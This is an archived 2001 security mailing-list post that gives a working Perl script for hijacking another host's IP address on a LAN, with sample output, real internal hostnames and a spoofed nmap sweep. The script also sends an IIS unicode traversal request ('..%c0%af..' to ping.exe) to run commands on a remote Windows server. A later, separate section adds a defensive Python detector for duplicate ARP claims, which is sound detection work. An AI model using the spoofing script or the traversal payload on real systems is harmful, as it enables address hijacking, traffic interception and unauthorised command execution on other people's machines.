Vulnerability Development mailing list archives

Re: Hijack IP Address using cable modem


From: cdowns <cdowns () SKILLSOFT COM>
Date: Thu, 29 Mar 2001 09:33:43 -0500

Playing around on my corporate LAN, this is gravy to accomplish. MediaOne
was a little more difficult, but I wrote this little script to automate
it (this one works :)). Here is my output:

setting up network spoof ....
ifconfig interface eth0:0 for spoof... .
----------------------------------------
eth0:0    Link encap:Ethernet  HWaddr 00:10:A4:C4:23:45
          inet addr:10.0.2.70  Bcast:10.0.3.255  Mask:255.255.254.0
          UP BROADCAST RUNNING  MTU:1500  Metric:1
          Interrupt:3 Base address:0x300

wait.. . using target to send icmp request.
-------------------------------------------
Reply from 10.0.2.70: bytes=32 time<10ms TTL=255
Reply from 10.0.2.70: bytes=32 time<10ms TTL=255
Reply from 10.0.2.70: bytes=32 time<10ms TTL=255
Reply from 10.0.2.70: bytes=32 time<10ms TTL=255

Ping statistics for 10.0.2.70:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum =  0ms, Average =  0ms

done
happy spoofing dud3z ~!
[root@scavenger /root]#

Perl script:

#!/usr/bin/perl -w

# ArpAttack.pl by: Christopher M Downs 04-28-01
# ---------------------------------------------
# This program was inspired by a thread that started on vuln-dev () securityfocus com
# most cable networks have ARP Broadcasts enabled so arp spoofing works on that network
# this is a proof of concept program and is intended for educational purposes only therefore !
# i am not responsible for anything bad or just plain evil done with this program.
# enough said you know the rules.
# -D
system ("clear");

use LWP::Simple;
use Getopt::Std;
getopts("t:n:b:u:?", \%args);

if ( $args{t} ) {
    $target = $args{t};
} else {
    Usage();
}
if ( $args{"?"} ){
    Usage();
}
# <---------------------------------------
## this is where we need to create a network alias on the local machine
## for the network target we would like to spoof.
## we will cheat for now and use system calls just for the sake of getting something that works....
if ( $args{n} ) {
    $netmask = $args{n};
}
if ( $args{b} ) {
    $broadcast = $args{b};
}
print "setting up network spoof .... \n";
sleep 2;
# system call here.
system("/sbin/ifconfig eth0:0 $target netmask $netmask broadcast $broadcast");
print ("ifconfig interface eth0:0 for spoof... .\n");
print ("----------------------------------------\n");
system("/sbin/ifconfig eth0:0");

# use uni-code server for icmp to spoofed host.
# <---------------------------------------
if ( $args{u} ) {
    $host_slut = $args{u};
    $uni_target = get("http://$host_slut/scripts/..%c0%af../winnt/system32/ping.exe?+$target");

    print "wait.. . using target to send icmp request.\n";
    print "-------------------------------------------\n";
    print ("$uni_target\n");
}
print "done\n";
print "happy spoofing dud3z ~!\n";
# <---------------------------------------
sub Usage {
    print <<USAGE;
  Usage: perl ArpAttack.pl -t <target> -n -b -u <uni-code server>
      -? this menu
      -t <target to spoof>
      -n netmask
      -b broadcast
      -u uni-code server to use
 Sample: perl ArpAttack.pl -t 192.168.x.x -n 255.255.255.0 -b 192.168.0.255 -u 192.168.20.x
 Note: this program needs to be run as root
USAGE
    exit;
}

nslookup of the target's DNS:
[root@scavenger /root]# nslookup scriptor.corp.skillsoft.com
Server:  dns.corp.skillsoft.com
Address:  10.0.2.78

Name:    scriptor.corp.skillsoft.com
Address:  10.0.2.70

[root@scavenger /root]#

Reply from tcpdump session while doing a ping sweep of the network:
[root@scavenger /root]# nmap -S 10.0.2.70 -sP 10.0.2.2-100

[root@scavenger /root]# tcpdump -i eth0:0 -p icmp
Kernel filter, protocol ALL, raw packet socket
tcpdump: listening on eth0:0
09:19:10.730838 scriptor.corp.skillsoft.com > dns.corp.skillsoft.com: icmp: echo request
09:19:10.731211 dns.corp.skillsoft.com > scriptor.corp.skillsoft.com: icmp: echo reply
09:19:10.733107 scriptor.corp.skillsoft.com > dns2.corp.skillsoft.com: icmp: echo request
09:19:10.733461 dns2.corp.skillsoft.com > scriptor.corp.skillsoft.com: icmp: echo reply
09:19:10.740784 scriptor.corp.skillsoft.com > acd.corp.skillsoft.com: icmp: echo request
09:19:10.741454 scriptor.corp.skillsoft.com > 10.0.2.98: icmp: echo request
09:19:10.742037 acd.corp.skillsoft.com > scriptor.corp.skillsoft.com: icmp: echo reply
09:19:10.742089 10.0.2.98 > scriptor.corp.skillsoft.com: icmp: echo reply

And obviously I get the replies on my end from nmap.

-D
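The post above shows what the hijack looks like from the attacker's side: a second station brings up an alias for an address that already belongs to scriptor, and the segment now has two MACs answering for 10.0.2.70. From the defender's side that is exactly what is visible in ARP traffic, so the following Python example (added here, not part of the original post or the author's script) shows the detection logic: it parses tcpdump-style `arp reply ... is-at ...` lines, records which MACs claim each IP, and raises an alert when an IP is claimed by a second MAC or when the observed MAC differs from a known-good binding (DHCP lease or inventory). The log lines, the known-good bindings and all MACs other than the page's 00:10:A4:C4:23:45 are constructed for the example.

```python
import re
from collections import defaultdict

# Constructed tcpdump-style ARP reply lines (not captured from the original
# post). The legitimate host answers for 10.0.2.70 first; a second station
# later claims the same IP from a different MAC, which is what bringing up an
# alias for somebody else's address looks like on the wire.
SAMPLE_ARP_LOG = """\
09:19:10.100000 arp reply 10.0.2.70 is-at 00:50:56:aa:bb:01
09:19:10.200000 arp reply 10.0.2.78 is-at 00:50:56:aa:bb:02
09:19:12.300000 arp reply 10.0.2.70 is-at 00:10:a4:c4:23:45
09:19:12.400000 arp reply 10.0.2.98 is-at 00:50:56:aa:bb:03
09:19:13.500000 arp reply 10.0.2.70 is-at 00:10:a4:c4:23:45
"""

# Known-good IP -> MAC bindings, e.g. exported from DHCP leases or an asset
# inventory (constructed for this example).
KNOWN_BINDINGS = {
    "10.0.2.70": "00:50:56:aa:bb:01",
    "10.0.2.78": "00:50:56:aa:bb:02",
}

# Matches "<ts> arp reply <ip> is-at <mac>"; MAC octets may be 1 or 2 hex
# digits because older tcpdump versions print "0:10:a4:..." without padding.
ARP_REPLY_RE = re.compile(
    r"^(?P<ts>\S+)\s+arp reply\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+is-at\s+"
    r"(?P<mac>(?:[0-9a-fA-F]{1,2}:){5}[0-9a-fA-F]{1,2})",
    re.IGNORECASE,
)


def normalize_mac(mac):
    """Canonical lower-case, zero-padded form so 0:10:A4 and 00:10:a4 compare equal."""
    return ":".join(part.zfill(2).lower() for part in mac.split(":"))


def parse_arp_replies(text):
    """Yield (timestamp, ip, mac) for every line that is an ARP reply."""
    for line in text.splitlines():
        m = ARP_REPLY_RE.match(line)
        if m:
            yield m.group("ts"), m.group("ip"), normalize_mac(m.group("mac"))


def detect_conflicts(text, known=None):
    """Return alerts for IPs claimed by more than one MAC, and for IPs whose
    observed MAC disagrees with the known-good binding. Each (ip, mac) pair is
    alerted once, on first sight, so repeated replies do not flood the output."""
    known = known or {}
    seen = defaultdict(dict)  # ip -> {mac: timestamp of first sighting}
    alerts = []
    for ts, ip, mac in parse_arp_replies(text):
        if mac in seen[ip]:
            continue
        seen[ip][mac] = ts
        if len(seen[ip]) > 1:
            alerts.append({
                "type": "duplicate_ip", "ts": ts, "ip": ip, "mac": mac,
                "previous": sorted(m for m in seen[ip] if m != mac),
            })
        if ip in known and known[ip] != mac:
            alerts.append({
                "type": "binding_mismatch", "ts": ts, "ip": ip, "mac": mac,
                "expected": known[ip],
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_conflicts(SAMPLE_ARP_LOG, KNOWN_BINDINGS):
        print(alert)
```

In practice the input would be `tcpdump -n -e arp` output or a switch's ARP inspection log rather than the embedded sample; the `binding_mismatch` check is the useful one on networks where DHCP leases or port security give you an authoritative table, while `duplicate_ip` still fires without any inventory at all.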
